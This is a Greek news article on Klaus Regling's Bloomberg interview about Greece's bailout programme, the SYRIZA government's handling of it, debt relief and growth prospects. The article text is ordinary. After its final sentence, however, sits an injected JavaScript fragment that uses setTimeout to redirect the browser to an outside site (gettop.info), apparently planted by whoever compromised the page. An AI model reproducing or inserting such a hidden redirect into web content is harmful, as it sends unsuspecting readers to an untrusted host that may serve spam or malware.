Ρέγκλινγκ στο Bloomberg: Η Ελλάδα δύσκολη περίπτωση

0
43

 

Σε συνέντευξή του στο Bloomberg ο επικεφαλής του ESM, Κλάους Ρέγκλινγκ αναφέρθηκε στην Ελλάδα, σημειώνοντας ότι «το πρόγραμμα δεν το στηρίζουν πλήρως όλοι στην ελληνική κυβέρνηση» και ότι πέρα από τον πρωθυπουργό και τον υπουργό Οικονομικών «δεν υπάρχει πλήρης ιδιοκτησία του προγράμματος» όπως είπε χαρακτηριστικά.

Η Ελλάδα λέει ο κ. Ρέγκλινγκ αποτελεί «δύσκολη περίπτωση», καθώς από τις πέντε χώρες που μπήκαν σε μνημόνιο μόνο η Ελλάδα παραμένει σε αυτό.

Επίσης, ο επικεφαλής του ESM επέκρινε ιδιαίτερα τους ατυχείς χειρισμούς της κυβέρνησης ΣΥΡΙΖΑ, η οποία προσπάθησε να «κινηθεί προς τα πίσω» όπως ανέφερε χαρακτηριστικά και να εφαρμόσει νέες στρατηγικές για να βγει από την κρίση που όπως είπε «δεν απέδωσαν, απέτυχαν και η Ελλάδα επέστρεψε στην ύφεση». Όμως, ο κ. Ρέγκλινγκ ανέφερε πως από τον προηγούμενο Αύγουστο επέστρεψε η κυβέρνηση σε νέα φάση συνεργασίας και έχουν ήδη εκταμιευθεί 29 από τα 86 δισ. του τρίτου προγράμματος.

Όσον αφορά στο θέμα του χρέους, ο κ. Ρέγκλινγκ ανέφερε ότι ο ESM εργάζεται στα βραχυπρόθεσμα μέτρα για την ελάφρυνσή του, καθώς η βασική ανάγκη είναι να μειωθεί ο αντίκτυπος των επιτοκίων για την Ελλάδα μελλοντικά και όπως είπε «αργότερα θα εξετάσουμε πόση πρόσθετη ελάφρυνση χρέους χρειάζεται πραγματικά».

Όπως σημείωσε ο επικεφαλής του Ευρωπαϊκού Μηχανισμού Σταθερότητας, οι προοπτικές για την ελληνική οικονομία «δεν είναι κακές», καθώς όπως λέει ακόμη και το ΔΝΤ αναθεώρησε προς τα πάνω τις προβλέψεις του για την ανάπτυξη στην Ελλάδα και πλέον αναμένει ανάπτυξη 2,8% το 2017. Ωστόσο, ο κ. Ρέγκλινγκ τονίζει πως η προϋπόθεση για την ανάπτυξη είναι πολύ σαφής, «πρέπει να συνεχιστεί η εφαρμογή του συμφωνηθέντος προγράμματος».

Και ενώ οι άνθρωποι κλειδιά του ελληνικού προγράμματος βρίσκονται από χθες στην Ουάσιγκτον για να συμμετάσχουν στην ετήσια σύνοδο του ΔΝΤ, η συζήτηση για το ελληνικό χρέος αναμένεται να είναι περιορισμένη.

Όπως είπε και ο κ. Ρέγκλινγκ, δεν έχει γίνει πρόοδος όσον αφορά στα μεσοπρόθεσμα μέτρα του χρέους που αναμένει το ΔΝΤ για να αποφασίσει τη συμμετοχή του στο ελληνικό πρόγραμμα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here